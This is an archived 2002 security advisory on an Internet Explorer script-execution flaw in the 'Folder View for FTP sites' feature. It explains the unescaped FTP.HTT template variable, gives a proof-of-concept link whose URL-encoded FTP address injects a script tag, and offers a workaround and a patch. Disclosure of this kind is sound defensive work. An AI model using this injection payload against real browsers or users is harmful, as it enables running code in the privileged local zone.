Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Browsers :: expl5417.htm

Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability



10th Jun 2002 [SBWID-5417]
COMMAND

	Internet  Explorer  'Folder  View  for  FTP  sites'   Script   Execution
	vulnerability
	

	

SYSTEMS AFFECTED

	 IE5.5SP1

	 IE5.5SP2

	 IE6.0

	

PROBLEM

	Eiji James Yoshida [zaddik@geocities.co.jp] found following:
	

	IE allows running Malicious Scripts due to a bug  in  'folder  View  for
	FTP sites'.
	

	If you enable both an 'Enable folder view for  FTP  sites'  IE  Advanced
	Setting and an 'Enable Web content in folders' Explorer  Folder  Option,
	the script embedded in FTP Server Address will run.  (Both  options  are
	set to 'Enable' by default.)
	

	 * It's important that the script runs in the My Computer zone!

	

	

	 Details

	 =======

	

	The problem is in FTP.HTT invoked by the 'folder  view  for  FTP  sites'
	feature.
	

	

	( %SystemRoot%\WEB\FTP.HTT )

	

	- --------------------FTP.HTT--------------------

	35:    <BASE href="%THISDIRPATH%\">

	- -----------------------------------------------

	

	

	This '%THISDIRPATH%' is not escaped.
	

	(Example 1)
	

	[ ftp://TARGET ]

	    '%THISDIRPATH%' = 'ftp://TARGET/'

	    <BASE href="ftp://TARGET/\">

	                ~~~~~~~~~~~~~

	

	

	(Example 2)
	

	[ ftp://"><script>alert("Exploit");</script> ]

	    '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'

	    <BASE href="ftp://"><script>alert("Exploit");</script>/\">

	                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	

	

	

	 Exploit code

	 ============

	

	

	<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>

	

	

	

	 Demonstration

	 =============

	

	

	http://www.geocities.co.jp/SiliconValley/1667/advisory02e.html

	

	

	

	 Add-on from Thor Larholm [Thor@jubii.dk]:

	 =========================================

	

	To clear things up, this is yet another XSS  vulnerability  that  allows
	arbitrary HTML to be inserted in the My Computer  zone.  This  makes  it
	quite easy to e.g. execute arbitrary commands, undoubtedly  a  more  fun
	demonstration:
	

	

	http://jscript.dk/Jumper/xploit/ftpfolderview.html

	

	

SOLUTION

	 Workaround

	 ==========

	

	Disable either 'Enable folder view for FTP sites'  IE  Advanced  Setting
	or 'Enable Web content in folders' Explorer Folder Option.
	

	 Patch (Update : 05 August 2002)

	 =====

	

	Get Microsoft Windows 2000 SP3
	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH